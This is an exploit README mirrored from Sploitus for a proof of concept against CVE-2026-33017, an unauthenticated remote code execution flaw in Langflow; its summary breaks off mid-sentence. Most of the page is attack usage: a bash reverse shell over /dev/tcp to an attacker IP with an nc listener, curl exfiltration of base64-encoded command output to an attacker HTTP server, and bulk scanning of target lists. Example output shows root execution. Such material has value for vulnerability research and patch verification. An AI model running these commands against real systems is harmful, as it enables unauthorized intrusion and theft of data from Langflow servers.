Share
## https://sploitus.com/exploit?id=CFEED51B-A567-5A95-9094-445E7B4A5933
# CVE-2026-33017 โ€” Langflow Unauthenticated RCE PoC

![CVE](https://img.shields.io/badge/CVE-2026--33017-red)
![CVSS](https://img.shields.io/badge/CVSS-9.3%20Critical-critical)
![Affected](https://img.shields.io/badge/Affected-Langflow%20%3C%3D%201.8.1-orange)
![Language](https://img.shields.io/badge/Language-Python-blue)

> **For educational and authorized testing purposes only.**

## Summary

Langflow ` **Important:** The PoC uses `os.system()` at module level โ€” the command runs on the server but its output goes to the **server's stdout**, not back to the HTTP response. The PoC only confirms that execution occurred (`[+] VULNERABLE`). To actually receive command output, use one of the exfiltration methods below.

**Blind confirmation (verifies RCE without capturing output)**

```bash
python poc.py --url http://target:7860 --cmd "id"
```

**Reverse shell โ€” with local listener**

```bash
# 1. Start a listener on your machine
nc -lvnp 4444

# 2. Send the reverse shell
python poc.py --url http://target:7860 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'"
```

**OOB exfiltration via HTTP callback โ€” with local server**

```bash
# 1. Start a local HTTP server
python3 -m http.server 8080

# 2. Exfiltrate output via curl callback
python poc.py --url http://target:7860 --cmd "curl http://10.10.14.1:8080/\$(id | base64 -w0)"
```

**With a known public flow UUID (no flow creation needed)**

```bash
python poc.py --url http://target:7860 --cmd "id" --flow-id 
```

**Bulk scan from file**

```bash
python poc.py --url-file targets.txt --cmd "id" --threads 10
```

### Example Output

The PoC confirms that execution occurred. `[+] VULNERABLE` means the build succeeded and the injected code ran โ€” it does **not** mean output was captured.

```
============================================================
  CVE-2026-33017 โ€” Langflow RCE PoC
============================================================
  Targets : 1
  Command : curl http://10.10.14.1:8080/$(id | base64 -w0)
  Threads : 5  |  Timeout : 15s
============================================================

[http://target:7860] auth: JWT token obtained
[http://target:7860] flow: created (3f2a1b4c-...)
[http://target:7860] [+] VULNERABLE โ€” RCE executed
[http://target:7860] flow: deleted (3f2a1b4c-...)

============================================================
  SUMMARY
============================================================
  [+] http://target:7860  VULNERABLE
============================================================

  1/1 target(s) vulnerable
```

Output received on the local HTTP server:

```
10.10.14.1 - - "GET /dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCk= HTTP/1.1" 200 -
# base64 -d โ†’ uid=0(root) gid=0(root) groups=0(root)
```

## References

- [GHSA-vwmf-pq79-vjvx](https://github.com/advisories/GHSA-vwmf-pq79-vjvx)
- [CVE-2026-33017](https://vulners.com/cve/CVE-2026-33017)
- [Langflow repository](https://github.com/langflow-ai/langflow)
- Related: [CVE-2025-3248](https://github.com/advisories/GHSA-xm5v-h5f2-2mjp) โ€” similar `exec()` issue on `/api/v1/validate/code`